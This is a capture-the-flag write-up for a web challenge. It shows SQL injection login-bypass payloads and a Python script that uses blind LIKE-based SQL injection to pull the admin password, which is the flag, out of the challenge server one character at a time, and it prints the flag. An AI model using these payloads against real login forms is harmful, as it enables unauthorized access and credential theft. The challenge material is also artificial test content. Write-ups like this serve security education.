
# Write-up: epic admin pwn

## Description

### My Story :smile:
When I opened the web page I first tried SQL Injection.
username: ' or '1'='1'--
It was truly injectable and I was like "Oh no!!! another easy sql injection :unamused:". but when I logged in I didn't see any useful data like flag or something.

So the game got interesting. I thinked deeply and remembered `LIKE` operator in SQL and a video of youtube in which the attacker used to extract some data byte by byte and this was the idea :star2:.

I chcked these inputs for `username` field and it worked (the login was successful):
' and pass like '%'--
' and pass like 'utflag{%}'--

### Exploit Time
I wrote this simple function for testing `LIKE` operator different values.
import requests
import string

def test(s):
r = requests.post('http://web2.utctf.live:5006/', data={'username': f"admin' and password like '{s}'--", 'pass':""})
return r.text.find('Welcome, admin!') != -1

Then I checked the length of flag with these few lines.
s = 'utflag{'

cnt = 0
while not test(s + '_' * cnt + '}'):
print(f'[X] cnt={cnt}')
cnt += 1
print(f'[+] cnt={cnt}')
and the result was 16. so the pass is LIKE `utflag{________________}`.

I extracted the pass (flag) byte by byte in the next step.
s = 'utflag{'

chars = ['[_]'] + list(string.ascii_lowercase + string.digits)

cnt = 16
found = 0
for i in range(cnt):
for j in chars:
ss = s + j + '_' * (cnt - found - 1) + '}'
if test(ss):
found += 1
s += j
print(f'[+] pass[{i}] : {j} ' + '#' * found + str(found / cnt) + '%')
print(f'[X] pass[{i}] : {j}')

[final script.py](./script.py)

### Flag
`utflag{dual1pa1sp3rf3ct}` :sunglasses:

Original writeup (https://github.com/HadiFazelinia/CTF-Challenges/blob/master/web/epic-admin-pwn/WRITEUP.md).